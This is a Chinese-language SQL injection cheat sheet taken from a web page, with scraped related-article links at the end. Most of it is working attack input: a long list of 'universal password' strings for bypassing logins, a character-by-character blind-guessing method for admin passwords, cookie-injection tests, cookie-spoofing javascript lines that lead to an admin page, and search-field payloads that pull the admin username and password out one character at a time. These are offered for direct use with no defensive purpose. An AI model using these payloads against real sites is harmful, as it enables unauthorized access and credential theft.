数据库其他注入思路 - 万能密码 - cookie注入 -搜索型注入
另类登录注入形式:
经常有一类验证(ASP,PHP,JSP均存在),先判断user是否存在,ASP为例子:"select password from admin where user_name='"&request("user_name")&"'";然后再判断密码MD5与之对比。 猜解思路可以构造,user_name: xxx' and password>'a 如果password第一位大于a,则继续user_name: xxx' and password>'b.
seelct * from admin where username='admin' and password=''注入方法:
万能用户名: xxx' union select * from users/*
select * from admin where username=admin and password=pass注入方法:
账户:777 密码:999 union select * from admin;
万能密码:
用户名:admin'or''='
密码:'or''=' username:' or 1=1 or ''=' passwd:随便写 'or'='or'
'or''='
'or 1=1
"or"="
'or 1=1/* php
"or "a"="a
"or 1=1--
"or"="
"or"="a'='a
"or1=1--
"or=or"
''or'='or'
') or ('a'='a
'.).or.('.a.'='.a
'or 1=1
'or 1=1--
'or 1=1/*
'or"="a'='a
'or' ''=''
'or''='
'or''=''or''=' !!!!!
'or'=''
'or'='or'
'or.'a.'='a
'or1=1--
'or''='
a'or' =--
a'or'=--
or 'a'='a'
or =--
or1=--
cookie注入:
http://xxxx/view.asp?id=23
先访问http://xxxx/view.asp?id=23 接着在浏览器里输入:
javascript:alert(document.cookie="id="+escape("23 and 1=1"))
再访问http://xxxx/view.asp(未出错) 再输入:javascript:alert(document.cookie="id="+escape("23 and 1=2"))
再访问:http://xxxx/view.asp(出错) 该页面出错就表示可以用Cookie注入。
cookie欺骗
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));
javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));
javascript:alert(document.cookie="admindj="+escape("1"));
然后login.asp改为admin_index.asp
搜索型注入
例如:
判断注入
%' and 1=1 and '%' ='
%' and 1=2 and '%' =' 判断是否存在表
%'and(select count(*)from admin)>0 and '%'='
判断是否存在字段段
%'and(select top 1 len(username)from admin) and '%'='
%'and(select top 1 len(password)from admin) and '%'='
猜字段中的内容范围
%'and(select top 1 asc(mid(username,1,1))from admin)>102 and '%'=' %'and(select top 1 asc(mid(username,1,1))from admin)>40 and '%'=' %'and(select top 1 asc(mid(username,1,1))from admin)=97 and '%'='
%'and(select top 1 asc(mid(username,2,1))from admin)=100 and '%'='
%'and(select top 1 asc(mid(username,3,1))from admin)=109 and '%'='
%'and(select top 1 asc(mid(username,4,1))from admin)=105 and '%'='
%'and(select top 1 asc(mid(username,5,1))from admin)=110 and '%'=' %'and(select top 1 asc(mid(password,1,1))from admin)=49 and '%'='
%'and(select top 1 asc(mid(password,2,1))from admin)=52 and '%'='
%'and(select top 1 asc(mid(password,3,1))from admin)=50 and '%'='
%'and(select top 1 asc(mid(password,4,1))from admin)=49 and '%'='
%'and(select top 1 asc(mid(password,5,1))from admin)=53 and '%'='
%'and(select top 1 asc(mid(password,6,1))from admin)=68 and '%'='
%'and(select top 1 asc(mid(password,7,1))from admin)=51 and '%'='
%'and(select top 1 asc(mid(password,8,1))from admin)=49 and '%'='
%'and(select top 1 asc(mid(password,9,1))from admin)=50 and '%'='
%'and(select top 1 asc(mid(password,10,1))from admin)=49 and '%'='
%'and(select top 1 asc(mid(password,11,1))from admin)=57 and '%'='
%'and(select top 1 asc(mid(password,12,1))from admin)=52 and '%'='
%'and(select top 1 asc(mid(password,13,1))from admin)=43 and '%'='
%'and(select top 1 asc(mid(password,14,1))from admin)=51 and '%'='
%'and(select top 1 asc(mid(password,15,1))from admin)=68 and '%'='
%'and(select top 1 asc(mid(password,16,1))from admin)=51 and '%'='
数据库其他注入思路 - 万能密码 - cookie注入 -搜索型注入的更多相关文章
- 注入语句详解(get注入,cookie注入,搜索型注入等)
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''=' 拆半法 ###################################### and exists (select ...
- Sqlserver2008+搜索型注入技术
简单的判断搜索型注入漏洞存在不存在的办法是先搜索',如果出错,说明90%存在这个漏洞.然后搜索%,如果正常返回,说明95%有洞了. 然后再搜索一个关键字,比如2006吧,正常返回所有2006相关的信息 ...
- Sqli-LABS通关笔录-11[sql注入之万能密码以及登录框报错注入]
在这一关卡我学到了 1.万能密码的构造,大概的去揣测正常的SQL语句是如何的. 2. 3. 00x1 SQL万能密码的构造 在登录框当中可以添加了一个单引号.报错信息如下所示: 据此报错,我们大概的可 ...
- 实验3 SQL注入原理-万能密码注入
实验目的 (1)理解[万能密码]的原理 (2)学习[万能密码]的使用 实验原理 一.访问目标网站 1.选择一个存在漏洞的论坛 http://192.168.1.3:8009 进入 2.输入用户名[ad ...
- 从c#角度看万能密码SQL注入漏洞
以前学习渗透时,虽然也玩过万能密码SQL注入漏洞登陆网站后台,但仅仅会用,并不理解其原理. 今天学习c#数据库这一块,正好学到了这方面的知识,才明白原来是怎么回事. 众所周知的万能密码SQL注入漏洞, ...
- pikachu-搜索型注入 #手工注入
1.搜索型注入漏洞产生的原因: 在搭建网站的时候为了方便用户搜索该网站中的资源,程序员在写网站脚本的时候加入了搜索功能,但是忽略了对搜索变量的过滤,造成了搜索型注入漏洞,又称文本框注入. 2.搜索型注 ...
- 深入浅出带你玩转sqlilabs(三)--GET,POST,COOKIE,万能密码注入
常见提交方式下的注入漏洞 WEB应用在数据传递接受中,针对SQL注入安全漏洞,由于数据大小,格式等原因,脚本在接受传递时会有多种传递方式,传递方式的不同将影响到安全测试的不同 第一点:数据常见提交方式 ...
- sql注入问题 java中将MySQL的数据库验证秘密加上 ' or '1'= '1 就可以出现万能密码
password的字符串中,加上 ' or '1'= '1 就可以制作出万能密码. 原因如下: 原代码中密码是123456 执行数据库查询语句 实际上执行的SQL语句是: select * from ...
- 万能密码的SQL注入漏洞其PHP环境搭建及代码详解+防御手段
目录 环境搭建 session会话 环境搭建代码 创建数据库脚本 登录界面html: 查询数据库是否为正确的账号密码php代码 连接数据库php代码: 注销登录代码(即关闭session会话) 登录成 ...
随机推荐
- Alpha冲刺 - (6/10)
Part.1 开篇 队名:彳艮彳亍团队 组长博客:戳我进入 作业博客:班级博客本次作业的链接 Part.2 成员汇报 组员1(组长)柯奇豪 过去两天完成了哪些任务 基于ssm框架的前后端交互测试,结合 ...
- 洛谷 P1967 货车运输(克鲁斯卡尔重构树)
题目描述 AAA国有nn n座城市,编号从 11 1到n nn,城市之间有 mmm 条双向道路.每一条道路对车辆都有重量限制,简称限重.现在有 qqq 辆货车在运输货物, 司机们想知道每辆车在不超过车 ...
- ZooKeeper 一致性协议 ZAB 原理
一致性协议有很多种,比如 Paxos,Raft,2PC,3PC等等,今天我们讲一种协议,ZAB 协议,该协议应该是所有一致性协议中生产环境中应用最多的了.为什么呢?因为他是为 Zookeeper 设计 ...
- WebApi Post string 参数 为空
用webApi做开发也有很久了 一些 细节平时可能未必很留心 今天就很奇葩 post 只接受一个string 参数的数据 但接收是一直未空 很奇怪 看了一些资料后得出以下结论
- Linq的Join == 两个foreach
因为实在太懒了,很久没动笔,今天强迫自己写一个小短篇. 之前讨论过用SelectMany代替两重的foreach循环.今天我们看一下Join和foreach的关系. 首先是Join的定义 public ...
- deamo的网址
https://blog.csdn.net/jydave/article/details/50656455 广播(Broadcast)的简单用法 http://www.cgtsj.com/cg/ ...
- crond脚本执行并发冲突问题
在计划任务中,偶尔会看到重复执行的情况: 例如我们公司的计划任务举例: */ * * * * root cd /opt/xxxx/test_S1/html/xxxx/admin; php index. ...
- 位集合(BitSet)| Java数据结构
Java Bitset类 BitSet使用示例: import java.util.BitSet; public class BitSetDemo { public static void main( ...
- mxonline实战13,授课讲师列表页,详情页,index页面全局导航
对应github地址:第13天 把teacher-list.html和teacher-detail.html拷贝过来 一. 授课讲师列表页 1. 修改html文件 把org-list.ht ...
- 架构师养成记--22.客户端与服务器端保持连接的解决方案,netty的ReadTimeoutHandler
概述 保持客户端与服务器端连接的方案常用的有3种 1.长连接,也就是客户端与服务器端一直保持连接,适用于客户端比较少的情况. 2.定时段连接,比如在某一天的凌晨建立连接,适用于对实时性要求不高的情况. ...